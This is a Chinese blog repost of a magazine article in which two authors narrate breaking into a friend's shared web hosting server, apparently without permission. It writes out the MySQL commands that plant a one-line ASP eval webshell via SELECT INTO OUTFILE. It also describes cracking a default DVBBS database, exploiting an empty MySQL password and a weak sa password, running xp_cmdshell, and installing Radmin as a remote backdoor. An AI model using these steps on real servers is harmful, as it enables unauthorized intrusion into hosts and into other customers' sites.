注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

网路游侠

www.youxia.org

 
 
 

日志

 
 

一次典型的虚拟主机入侵  

2006-01-08 15:01:13|  分类: 02 游侠·原创 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本次入侵过程由空虚浪子心和网路游侠合作完成,文章也是两个人的角度写的,希望大家喜欢这种方式。^_^

网路游侠

学校一位朋友租用了一台服务器,做WEB服务器,大款啊……

某日,本人无所事事,于是准备看看朋友服务器的安全性如何。我知道他的服务器上除了自己公开的网站之外,还放了几个正在建设中的站点。

敲上一个他新买的域名地址,发现网站也是新做的,并且非常漂亮。于是就想down一个看看。当然程序我是有的,但是版本比较老,其实直接向朋友要也没有问题,但是本着 “自己动手,丰衣足食”的指导思想,再想想咱们“所谓Hacker”的精神,还是自己拿吧,顺便把这次的测试结果告诉朋友,也算是补偿。呵呵

首先下载桂林老兵的“虚拟主机站点查询工具”,看到主机上放着如下几个网站:

1136703626457_8415.gif

依次打开网站看有无漏洞,有如下总结:

1、两个新手从网上下载的整站程序没有修改默认用户名和密码admin,但是这两套程序的admin也只能添加文章、软件,没有更多的权限,无法利用。

2、主要的程序经过手工探测和NBSI v2的测试,确认没有SQL Injection漏洞,这样子就无法拿到一些帐号可以上传等的权限。

陷入僵局中。

空虚浪子心

网站以前曾经进去过,所以如果他没有修改服务器名称并且修改物理路径的话 ^_^ ——我现在知道站点的物理路径,以及他的机器名。既然上次进去过,也许有缘,就再来一次吧!

还是要刺探信息。网站论坛的目录是www.xxxxx.com/bbs,还有/bs,/bbs1,这两个是我事先知道的,因为他刚装了yuzi,怕不能正常运行,所以留下了一个动网/bbs1(已经打了补丁,后门也不在),/bs一直是站点维护并不使用着,看起来站长不打算用它。

先看看他的权限吧,随便找了个比较简单的站进去webshell,发现权限设置还比较严格,不能浏览其他盘.(什么?问我怎么进去的?是我疏忽——DVBBS 6数据库默认,下载之后暴力破解密码,然后在后台更改注册信息,随便写个东东进去——剩下不用我废话吧?)现在是要进一步通过这个webshell得到一些信息。推荐砍客联盟的asp木马,很牛的!(图二)这台计算机的进程表就出来了看看他都运行什么服务

1136703637232_5572.gif

gram Files\Symantec\pcAnywhere\awhost32.exe是pcanywhere的进程

gram Files\Symantec_Client_Security\Symantec AntiVirus\Rtvscan.exe这是Symantec AntiVirus杀毒软件

Serv-U--Serv-U FTP 服务器--2  gram Files\Serv-U\ServUDaemon.exe

SQLSERVERAGENT--SQLSERVERAGENT--3  OGRA~1\MICROS~1\MSSQL\binn\sqlagent.exe

W3SVC--World Wide Web Publishing Service--2  WINNT\System32\inetsrv\inetinfo.exe

MySql--MySql--2  mysql/bin/mysqld-nt.exe

别的信息没什么用,现在要想得到系统控制权,还是从MS SQL入手,x-scan扫描了一下,没有弱口令。陷入僵局,打算另找途径。

网路游侠

X-Scan的扫描结果非常要人郁闷——MySQL的口令是空哦!典型的默认安装!(后来我问管理服务器的朋友,他说有密码,看来他是把MySQL Admin的密码当成MySQL的密码了)。既然得到这些,就可以用牛族的SMysql-v1.7连接了。

郁闷,天不早了,准备睡觉,明天还要忙呢!

空虚浪子心

用牛族的东东,必须要得到web物理路径才行。这就有点麻烦,上次得到站点路径在d:\wwwroot\下,但是这次我又找的站点却在g:\user\*****下,这可不好分析了,那么我们要的站点到底在哪个目录下呢?那个站点只有一个bbs,站点域名是一排数字,仍然不敢断定站点路径。

又到处看着站点,翻了一段时间,突然在浏览它的站点时发现"感谢**网站提供托管主机服务!"这下,全明白了!这个站长,除了自己的站点之外,还把别人站放上去自己赚钱!那么d:\是他自己的站点,而g:\user\就是来找他要空间的站点了,也就是说可以确定,我要的东东就在g:\user\*****下(请注意,这个*****,可不代表上面的都一样),我再看一下得到的讯息,又提取出来这些。

我已经入侵的站点从webshell的讯息:

--------------------------------------------------------

机器名 ***R2MQGH 帐号 CUS_X*** WEB路径 G:\user\xi***\ 

用cmdshell得到用户(虽然不能添加,但是可以查看)

Administrator            ASPNET                   CUS_***                  

CUS_****                 CUS_*****                CUS_**gi                  

CUS_changan              CUS_cra**              CUS_**hudie             

CUS_fen**              CUS_he**              CUS_ima**               

CUS_LB**                   CUS_lc**                 CUS_L**                  

CUS_Ltgm**                 CUS_mail                 Cus_p**                 

CUS_Qun**                CUS_s**                  CUS_s**                  

CUS_us**                  CUS_Xi***             

--------------------------------------------------------

可以推断:不管是哪一个站点,用户都是CUS_开头之后是他的申请时候用户名比如CUS_changan里面并没有数字的站(我要的程序就是数字域名),但是他的名称却是“长安***”,所以,这个CUS_changan 就是我要的!根据他的习惯G:\user\xi***\ ,推断我要得路径就是G:\user\changan\

既然得到路径,我就顺便把使用牛族的教程+牛族的SMysql-v1.7过程大略说一下:

----------------------------------------引用牛族教程附加修改

得到密码后,用牛族SuperMysql连接器 V1.7连上去,接着输入:

use mysql;

进入mysql这个数据库

create table shuangfeng(cmd TEXT)

选择在名叫mysql的库中建一个名叫shuangfeng的表,这个表只有一个字段名叫cmd,数据类型为TEXT

insert into shuangfeng values("<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>")

就是在shuangfeng的表里写入<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>

相信明眼人一看就知道,冰狐浪子,一句话,而且还不用过滤什么"号

select * from shuangfeng into outfile "g:\\user\\changan\\kxlzx.asp"

很明显,是把表中的内容输出到g:\user\changan\kxlzx.asp

-------------------------------------------引用结束

查看果然有了kxlzx.asp,成功!赶快用其他数据库连接器连接,把那个表删除。我就不抓图了。关键是后面。

现在已经差不多了!在告诉网路游侠的同时,我也上传了方便一点的木马。但是用webshell下载这东东不方便。的确,要想得到方便的传输,最好是放个radmin上去,或者开3389,因为3389动作太大,我还是想用radmin.这就要得到系统控制权,而上传文件可以用webshell,不是问题。要想用MySQL得到权限,我还没找到相应办法,不过既然拿到了这个webshell,可以利用的,前面已经说了,它MS SQL数据库。(图三)

1136703652874_2284.gif

找到了数据库连接文件Password=sa1;" & "Persist Security Info=True;User ID=sa

晕倒。。。这么弱的密码!我的扫描器还刚好没有!于是SqlExec连接(图4),连接成功。

1136703662537_6331.gif

利用webshell上传radmin服务端。然后移动到c:\winnt\system32下,执行。

再一看!端口4899打开!连接后找到了我说的g:\user\目录!(图5)

1136703674635_3821.gif

好的,这下入侵才算完毕了!

网路游侠PS

在入侵的的过程中,空虚浪子心发现了SQL Server密码之后,我在本地装了一个SQL Server,连接上了远程的SQL数据库,用查询分析器测试:

xp_cmdshell "dir c:\"”

显示初了C盘根目录下面的文件!呵呵,接下来可以用他执行一些命令了,别忘了,sa的权限可是system的哦!写木马、拷文件……都不在话下!

当然,这些以前的文章都写过了,不再多说了,要不土豆编辑就说我和空虚浪子心联合骗稿费了!呵呵

关于上面的文字:
发表于:2004年10月《黑客X档案》
版权:1、归发表该文的杂志社;2、归本文作者。
如承蒙转载请注明发表于该期杂志,以及作者姓名,谢谢合作!
作者:X.U.S.T安全组 网路游侠&空虚浪子心
  评论这张
 
阅读(113)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017